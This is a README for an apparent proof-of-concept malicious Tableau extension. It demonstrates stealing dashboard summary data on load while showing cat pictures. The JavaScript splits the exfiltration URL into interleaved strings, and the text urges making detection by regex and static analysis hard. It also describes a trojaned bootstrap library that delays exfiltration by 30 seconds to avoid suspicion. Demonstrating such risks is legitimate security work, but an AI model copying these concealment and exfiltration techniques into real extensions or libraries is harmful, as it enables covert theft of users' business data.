# Evil extension POCs


This extension demonstrates the dangers of deploying Tableau extensions to your Tableau Server.

# Install

```bash
npm install
node server.js

# In tableau load the Evil....trex file

```


# Evil Extension

![Demo](evil-demo-01.gif)

The goal is to show nice cats to the user on her/his dashboard (representing all the unsecured content unsuspecting users throw into their Tableau), while exfiltrating the summary data on load.

The data is sent to the local server, to an endpoint specified in `public/evil-core.js` (this is where you can let your creativity shine -- just make it hard to use regexes and static analisys after minification):


```javascript
  function exfilUrl1() {
    return 'ht:/oahs:00dm';
  }

  function exfilUrl2() {
    return 'tp/lclot99/up';
  }

  // ======================================================================
  // EXFIL URL RETRIEVAL FUNCTION.
  // Do something creative here to spread the URL across the file, encode it
  // etc...
  // ======================================================================
  function getExfilUrl() {
    const o = [];
    const a = exfilUrl1();
    const b = exfilUrl2();
    let i = 0;

    while (true) {
      o.push( i % 2 ? b[parseInt(i/2)] : a[i/2]);
      ++i;
      if (i >= a.length + b.length) {
        break;
      }
    }
    return o.join('');
  }


```



## Evil libraries

Any JS file that is loaded by Tableau can contain such backdoors. Our example `public/libraries/bootstrap.evil.js` hides the same code inside with a little bit different trigger mechanism: as we dont want to raise suspocion, we wait a 30 seconds after the page load to try and exfiltrate the data.

(look at the end of the file).

However, the same file can be minified: `public/libraries/bootstrap.evil.min.js`


```
curl -X POST -s --data-urlencode 'input@public/libraries/bootstrap.evil.js' https://javascript-minifier.com/raw > public/libraries/bootstrap.evil.min.js
```
